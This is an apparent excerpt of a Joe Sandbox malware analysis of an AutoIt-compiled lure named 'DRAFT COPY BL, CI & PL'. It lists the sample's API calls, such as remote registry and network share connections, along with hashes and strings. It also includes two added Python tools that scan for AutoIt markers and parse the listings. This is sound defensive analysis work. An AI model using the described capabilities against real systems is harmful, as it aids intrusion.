                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009BBB74
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                • String ID:
                                                                • API String ID: 3840717409-0
                                                                • Opcode ID: 91178dfba83a7234e11bbcd9d759c0ddca732561d2da9568d2c5de378fdb2111
                                                                • Instruction ID: 2678d990e25ef1fa06656e13552bb12895d86536ac23c565ab75de20b1902eaf
                                                                • Opcode Fuzzy Hash: 91178dfba83a7234e11bbcd9d759c0ddca732561d2da9568d2c5de378fdb2111
                                                                • Instruction Fuzzy Hash: 6C414975604208FFDB119F69DE98EAABBBCFB89721F104168F906D72A0C7709D01DB20
                                                                APIs
                                                                • __wsplitpath.LIBCMT ref: 0099DA10
                                                                • _wcscat.LIBCMT ref: 0099DA28
                                                                • _wcscat.LIBCMT ref: 0099DA3A
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0099DA4F
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DA63
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0099DA7B
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0099DA95
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DAA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                • String ID: *.*
                                                                • API String ID: 34673085-438819550
                                                                • Opcode ID: bd4362d4618b6210c775b3c110013304fca0937db4846768662b260cbd567c87
                                                                • Instruction ID: 1a7440796cd6a6bd8d82cdb97a4c18c3dc3d8d9e8957b5b3579dd6f1fca26fa4
                                                                • Opcode Fuzzy Hash: bd4362d4618b6210c775b3c110013304fca0937db4846768662b260cbd567c87
                                                                • Instruction Fuzzy Hash: 6E8180725062419FCF24EF69C884A6AB7E8AF89314F184C2EF889DB251E634D945CB52
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009BC1FC
                                                                • GetFocus.USER32 ref: 009BC20C
                                                                • GetDlgCtrlID.USER32(00000000), ref: 009BC217
                                                                • _memset.LIBCMT ref: 009BC342
                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009BC36D
                                                                • GetMenuItemCount.USER32(?), ref: 009BC38D
                                                                • GetMenuItemID.USER32(?,00000000), ref: 009BC3A0
                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009BC3D4
                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009BC41C
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009BC454
                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 009BC489
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                • String ID: 0
                                                                • API String ID: 1296962147-4108050209
                                                                • Opcode ID: 716f6bd862e4a97b1b9ba6321c2a23c5825843a03e517a74a12e497a7eb8819b
                                                                • Instruction ID: ca0218a52a623347bc6e3e4eb25538414f5215988d1a89e73dcc49a3bcf5378c
                                                                • Opcode Fuzzy Hash: 716f6bd862e4a97b1b9ba6321c2a23c5825843a03e517a74a12e497a7eb8819b
                                                                • Instruction Fuzzy Hash: 558181B0608301AFD710DF14CA94ABBBBE9FF88764F00492EFA95972A1D770D905DB52
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 009A738F
                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009A739B
                                                                • CreateCompatibleDC.GDI32(?), ref: 009A73A7
                                                                • SelectObject.GDI32(00000000,?), ref: 009A73B4
                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009A7408
                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009A7444
                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009A7468
                                                                • SelectObject.GDI32(00000006,?), ref: 009A7470
                                                                • DeleteObject.GDI32(?), ref: 009A7479
                                                                • DeleteDC.GDI32(00000006), ref: 009A7480
                                                                • ReleaseDC.USER32(00000000,?), ref: 009A748B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                • String ID: (
                                                                • API String ID: 2598888154-3887548279
                                                                • Opcode ID: dbb56aaba9feff97af654dd7c4bfa2462c79c1f8a9e30d9cd5f5f28d2c3cd827
                                                                • Instruction ID: 0f35e94471e2505b98abea2d9d97a2052604baa2e0aa232cef32aec6c77bcfbd
                                                                • Opcode Fuzzy Hash: dbb56aaba9feff97af654dd7c4bfa2462c79c1f8a9e30d9cd5f5f28d2c3cd827
                                                                • Instruction Fuzzy Hash: 55516971904309EFCB14CFA8DC85EAEBBB9EF49310F14852DF99A97221C731A840DB90
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: 0`$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                • API String ID: 3964851224-3363271904
                                                                • Opcode ID: 6d394d453089e2d9f6509fd472430b18c0df69fff6d5f6fe4dcce0058e3e4b0e
                                                                • Instruction ID: 9f19849f6bbd698157199f957e1a0cc9cd01bb1fe6ad7cb88f4dcde63a19116a
                                                                • Opcode Fuzzy Hash: 6d394d453089e2d9f6509fd472430b18c0df69fff6d5f6fe4dcce0058e3e4b0e
                                                                • Instruction Fuzzy Hash: D441497120035A8BCF21EF51DA56BFF37A4AF91324F540454FC551B2A2EB349D1ACBA0
                                                                APIs
                                                                  • Part of subcall function 00950957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00936B0C,?,00008000), ref: 00950973
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00936BAD
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00936CFA
                                                                  • Part of subcall function 0093586D: _wcscpy.LIBCMT ref: 009358A5
                                                                  • Part of subcall function 0095363D: _iswctype.LIBCMT ref: 00953645
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                • API String ID: 537147316-1018226102
                                                                • Opcode ID: 8e204b77909d7e63cdbe71020e12dbeead4baa0f35e71722560a12f30143ac6e
                                                                • Instruction ID: 5f7039d021f362c32e1a4825c0977492976dd33c6cab1680b5cbf909c5049104
                                                                • Opcode Fuzzy Hash: 8e204b77909d7e63cdbe71020e12dbeead4baa0f35e71722560a12f30143ac6e
                                                                • Instruction Fuzzy Hash: 12027874108341AFCB24EF24C891AAFBBE5AFD9314F14491DF49A972A1DB30D949CF52
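The String ID above ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<", "#include depth exceeded...") belongs to the AutoIt3 interpreter stub that wraps a compiled script, not to the script payload itself. The following is an added example, not Joe Sandbox output and not code from the sample, that scans a dump or file for those markers. The marker strings are the ones in the listing; that "AU3!" is immediately followed by the version tag "EA06" in a compiled binary, and that the script tag may be stored as UTF-16LE as well as 8-bit text, are the editor's assumptions, so both encodings are searched.

```python
"""Scan a memory dump or file for the AutoIt3 compiled-script markers that the
interpreter function listed above compares against.

Added example for this report; it is not Joe Sandbox output and not code from
the sample. Marker strings come from the function's String ID line; the
"AU3!EA06" concatenation and the UTF-16LE variant of the script tag are the
editor's assumptions about how they appear in a compiled binary."""
import re
from typing import Dict, List

SCRIPT_TAG = ">>>AUTOIT SCRIPT<<<"

MARKERS: Dict[str, "re.Pattern[bytes]"] = {
    # "AU3!" followed by the version tag "EA06" heads an embedded compiled
    # script. The interpreter compares the two halves separately, which is why
    # the listing shows them as two strings; "EA06" alone is too short to be
    # a useful indicator, so only the joined form is searched.
    "au3_header": re.compile(re.escape(b"AU3!EA06")),
    # The script tag may be stored as 8-bit or UTF-16LE text; search both.
    "script_tag_ascii": re.compile(re.escape(SCRIPT_TAG.encode("ascii"))),
    "script_tag_utf16": re.compile(re.escape(SCRIPT_TAG.encode("utf-16-le"))),
}


def find_autoit_markers(blob: bytes) -> Dict[str, List[int]]:
    """Return {marker_name: [byte offsets]} for every marker occurrence in blob."""
    return {name: [m.start() for m in rx.finditer(blob)] for name, rx in MARKERS.items()}


def looks_like_compiled_autoit(blob: bytes) -> bool:
    """True when the AU3!EA06 header or the script tag (either encoding) is present."""
    return any(find_autoit_markers(blob).values())


# Constructed test blob (not bytes from the analysed sample): 16 bytes of
# padding, the header at offset 16, 8 bytes of padding, then the UTF-16LE
# script tag at offset 32.
SAMPLE_BLOB = (
    b"\x00" * 16
    + b"AU3!EA06"
    + b"\x00" * 8
    + SCRIPT_TAG.encode("utf-16-le")
)

if __name__ == "__main__":
    for name, offsets in find_autoit_markers(SAMPLE_BLOB).items():
        print(f"{name:18s} {[hex(o) for o in offsets]}")
    print("compiled AutoIt:", looks_like_compiled_autoit(SAMPLE_BLOB))
```

Run it over the process dump rather than the on-disk file when the packer has already been peeled: a hit confirms the AutoIt stub, but says nothing about what the embedded script does, which is the part that needs decompiling.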
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992D50
                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00992DDD
                                                                • GetMenuItemCount.USER32(009F5890), ref: 00992E66
                                                                • DeleteMenu.USER32(009F5890,00000005,00000000,000000F5,?,?), ref: 00992EF6
                                                                • DeleteMenu.USER32(009F5890,00000004,00000000), ref: 00992EFE
                                                                • DeleteMenu.USER32(009F5890,00000006,00000000), ref: 00992F06
                                                                • DeleteMenu.USER32(009F5890,00000003,00000000), ref: 00992F0E
                                                                • GetMenuItemCount.USER32(009F5890), ref: 00992F16
                                                                • SetMenuItemInfoW.USER32(009F5890,00000004,00000000,00000030), ref: 00992F4C
                                                                • GetCursorPos.USER32(?), ref: 00992F56
                                                                • SetForegroundWindow.USER32(00000000), ref: 00992F5F
                                                                • TrackPopupMenuEx.USER32(009F5890,00000000,?,00000000,00000000,00000000), ref: 00992F72
                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00992F7E
                                                                Similarity
                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                • String ID:
                                                                • API String ID: 3993528054-0
                                                                • Opcode ID: 98d1bf614fef425a6e2a3237296f7fed67fab52397aa12977df195ebceb6f01f
                                                                • Instruction ID: 220578356bd065e21d2d67e74dee0844815d1b83cc436bb355b4f12b279b3890
                                                                • Opcode Fuzzy Hash: 98d1bf614fef425a6e2a3237296f7fed67fab52397aa12977df195ebceb6f01f
                                                                • Instruction Fuzzy Hash: C771C070644209BAEF219F5CDC89FAABF68FF44364F140216F625AA1E1C7B16860DB94
                                                                APIs
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • _memset.LIBCMT ref: 0098786B
                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009878A0
                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009878BC
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009878D8
                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00987902
                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0098792A
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00987935
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0098793A
                                                                Similarity
                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                • API String ID: 1411258926-22481851
                                                                • Opcode ID: 08ea0c022a1720eb992bbea85788b2bcaec31a7835ddb204cf3c59e9cc11063a
                                                                • Instruction ID: 3a503de890e35de146c36f0c5c8174eb49b48dce0656d443022e96175ad63274
                                                                • Opcode Fuzzy Hash: 08ea0c022a1720eb992bbea85788b2bcaec31a7835ddb204cf3c59e9cc11063a
                                                                • Instruction Fuzzy Hash: 8D41E772814229ABCF21EBE4DC95EEEF7B8BF44714F404169F915A3261EA319E04CF90
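Every function record on this page lists its calls in the form `Name.MODULE(args), ref: ADDR`, with `?` for arguments the sandbox could not resolve and an indented `Part of subcall function ADDR:` prefix for calls made one level down. The following is an added example, not Joe Sandbox code and not code from the sample, that parses those lines into records and summarises a function; the sample lines are copied from the WNetAddConnection2W / RegConnectRegistryW function directly above, and WATCHLIST is the editor's own choice of calls worth flagging (80000002 as the second RegConnectRegistryW argument is HKEY_LOCAL_MACHINE on the named remote host).

```python
"""Parse the per-function API listing of a Joe Sandbox report (the
'Name.MODULE(args), ref: ADDR' lines above) into records and summarise them.

Added example; not Joe Sandbox code and not code from the sample. The sample
lines are copied from the WNetAddConnection2W/RegConnectRegistryW function
above; WATCHLIST is the editor's own choice of calls worth a second look."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Three shapes occur in the listing:
#   _memset.LIBCMT ref: 0098786B                            (no argument list)
#   RegOpenKeyExW.ADVAPI32(?,?,00000000,...), ref: 009878D8 (argument list)
#   Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Remote-capable calls an analyst would want flagged (editor's assumption, not
# a Joe Sandbox rule). 80000002 as the second RegConnectRegistryW argument is
# HKEY_LOCAL_MACHINE on the named remote host.
WATCHLIST = {"WNetAddConnection2W", "RegConnectRegistryW"}


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: Tuple[str, ...]   # '?' marks an argument the sandbox could not resolve
    ref: int                # address of the call site
    caller: Optional[int]   # set when the call sits inside a subcall


def parse_api_line(line: str) -> Optional[ApiRef]:
    """Parse one listing line; return None for lines that are not API references."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = tuple(m["args"].split(",")) if m["args"] is not None else ()
    caller = int(m["caller"], 16) if m["caller"] else None
    return ApiRef(m["api"], m["module"], args, int(m["ref"], 16), caller)


def summarize(lines: Iterable[str]) -> Dict[str, object]:
    """Module histogram, unresolved-argument count, watch-list hits and subcalls."""
    refs: List[ApiRef] = [r for r in map(parse_api_line, lines) if r is not None]
    return {
        "count": len(refs),
        "by_module": dict(Counter(r.module for r in refs)),
        "unresolved_args": sum(a == "?" for r in refs for a in r.args),
        "watchlist_hits": sorted({r.api for r in refs if r.api in WATCHLIST}),
        "subcalls": [(hex(r.caller), r.api) for r in refs if r.caller is not None],
    }


# Lines copied from the function listing above, plus one non-API header line.
SAMPLE_LINES = [
    "  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06",
    "• _memset.LIBCMT ref: 0098786B",
    "• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009878A0",
    "• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009878BC",
    r"• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009878D8",
    r"• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00987902",
    r"• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0098792A",
    r"• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00987935",
    r"• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0098793A",
    "Strings",
]

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key:16s} {value}")
```

The `?` count matters when reading these listings: a high proportion of unresolved arguments means the static pass could not recover the values, so the remote host name handed to WNetAddConnection2W and RegConnectRegistryW here is unknown from this record alone and has to come from the dynamic trace.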
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0096E2A0,00000010,?,Bad directive syntax error,009BF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0098F7C2
                                                                • LoadStringW.USER32(00000000,?,0096E2A0,00000010), ref: 0098F7C9
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • _wprintf.LIBCMT ref: 0098F7FC
                                                                • __swprintf.LIBCMT ref: 0098F81E
                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0098F88D
                                                                Similarity
                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                • API String ID: 1506413516-4153970271
                                                                • Opcode ID: 56e1b74bf14edeb177dc5e005b1df9fdfdd52d8f7d80f486c24800dadf1da423
                                                                • Instruction ID: 43721ae2fb9826b591352a9c1b6e9d21c25f0afbe0091f2dbdccd7b8ad9abea6
                                                                • Opcode Fuzzy Hash: 56e1b74bf14edeb177dc5e005b1df9fdfdd52d8f7d80f486c24800dadf1da423
                                                                • Instruction Fuzzy Hash: 04218E3291421EEBCF12EFD0CC1AFEEB738BF58310F040465B515661A2DA31AA18DF51
                                                                APIs
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                  • Part of subcall function 00937924: _memmove.LIBCMT ref: 009379AD
                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00995330
                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00995346
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00995357
                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00995369
                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0099537A
                                                                Similarity
                                                                • API ID: SendString$_memmove
                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                • API String ID: 2279737902-1007645807
                                                                • Opcode ID: 40b8ec0ec92aaac68251f60be38b2656645039b2145c72d025b1626124f6cde6
                                                                • Instruction ID: 9e7bf4f5e6e86608f06437b9ede930c94fced3379887ad341d67ede720d00dd2
                                                                • Opcode Fuzzy Hash: 40b8ec0ec92aaac68251f60be38b2656645039b2145c72d025b1626124f6cde6
                                                                • Instruction Fuzzy Hash: 77118661950159B9DB25B6F6CC4AEFFBB7CEBD5B44F400419B405920E1EEA00D44CA61
                                                                Similarity
                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                • String ID: 0.0.0.0
                                                                • API String ID: 208665112-3771769585
                                                                • Opcode ID: e7415edc99fbd2425289ba8688fed86bfd9dc574ba7a98732db4e8cf2d271344
                                                                • Instruction ID: d87deeda83b3e9c87ad75a2879795d809d0707b1d2febc70f0052fe36ab41e60
                                                                • Opcode Fuzzy Hash: e7415edc99fbd2425289ba8688fed86bfd9dc574ba7a98732db4e8cf2d271344
                                                                • Instruction Fuzzy Hash: AD1105325041086BDF11AB759C4AEDA77BCEB86722F0002B6F849960A1EF708A868B50
                                                                APIs
                                                                • timeGetTime.WINMM ref: 00994F7A
                                                                  • Part of subcall function 0095049F: timeGetTime.WINMM(?,75C0B400,00940E7B), ref: 009504A3
                                                                • Sleep.KERNEL32(0000000A), ref: 00994FA6
                                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00994FCA
                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00994FEC
                                                                • SetActiveWindow.USER32 ref: 0099500B
                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00995019
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00995038
                                                                • Sleep.KERNEL32(000000FA), ref: 00995043
                                                                • IsWindow.USER32 ref: 0099504F
                                                                • EndDialog.USER32(00000000), ref: 00995060
                                                                Similarity
                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                • String ID: BUTTON
                                                                • API String ID: 1194449130-3405671355
                                                                • Opcode ID: 56471999cce843940ff45e057f91a5e36b21f228c74ecb88ab7b99525d392e9a
                                                                • Instruction ID: d3e3b04f3df68629906bf19df1be4b22d3899aac765522f256b9a9af9e7242d4
                                                                • Opcode Fuzzy Hash: 56471999cce843940ff45e057f91a5e36b21f228c74ecb88ab7b99525d392e9a
                                                                • Instruction Fuzzy Hash: E421C07022C609BFEB225F28EE99F363B6DEB48755F051228F509921B1DB718D00FB61
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • CoInitialize.OLE32(00000000), ref: 0099D5EA
                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0099D67D
                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0099D691
                                                                • CoCreateInstance.OLE32(009C2D7C,00000000,00000001,009E8C1C,?), ref: 0099D6DD
                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0099D74C
                                                                • CoTaskMemFree.OLE32(?,?), ref: 0099D7A4
                                                                • _memset.LIBCMT ref: 0099D7E1
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0099D81D
                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0099D840
                                                                • CoTaskMemFree.OLE32(00000000), ref: 0099D847
                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0099D87E
                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0099D880
                                                                Similarity
                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                • String ID:
                                                                • API String ID: 1246142700-0
                                                                • Opcode ID: c14a6f152ecf44c42f9a8ee518a7262fd2cbac4e730708ddf803b7ec6882f026
                                                                • Instruction ID: 0a6e7bdece49f3a5ab741ae903f5ee054d8602a525b006987f35c2527b6180ca
                                                                • Opcode Fuzzy Hash: c14a6f152ecf44c42f9a8ee518a7262fd2cbac4e730708ddf803b7ec6882f026
                                                                • Instruction Fuzzy Hash: B3B1DD75A00109AFDB04DFA8C894EAEBBB9EF89314F148559F909DB261DB30ED45CF50
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000001), ref: 0098C283
                                                                • GetWindowRect.USER32(00000000,?), ref: 0098C295
                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0098C2F3
                                                                • GetDlgItem.USER32(?,00000002), ref: 0098C2FE
                                                                • GetWindowRect.USER32(00000000,?), ref: 0098C310
                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0098C364
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0098C372
                                                                • GetWindowRect.USER32(00000000,?), ref: 0098C383
                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0098C3C6
                                                                • GetDlgItem.USER32(?,000003EA), ref: 0098C3D4
                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0098C3F1
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0098C3FE
                                                                Similarity
                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                • String ID:
                                                                • API String ID: 3096461208-0
                                                                • Opcode ID: 0c8351ed4fc6670e681baf79b169a2d98e784954ba66c77734fe1a60e9a92196
                                                                • Instruction ID: b22a6afe2f7a80e53d08412b8b5577bf6786bb2ee5fbd338d0b8824015147980
                                                                • Opcode Fuzzy Hash: 0c8351ed4fc6670e681baf79b169a2d98e784954ba66c77734fe1a60e9a92196
                                                                • Instruction Fuzzy Hash: CD5132B1B10205AFDF18DFA9DD99A6EBBB9EB88711F14822DF915D7290D7709D008B10
                                                                APIs
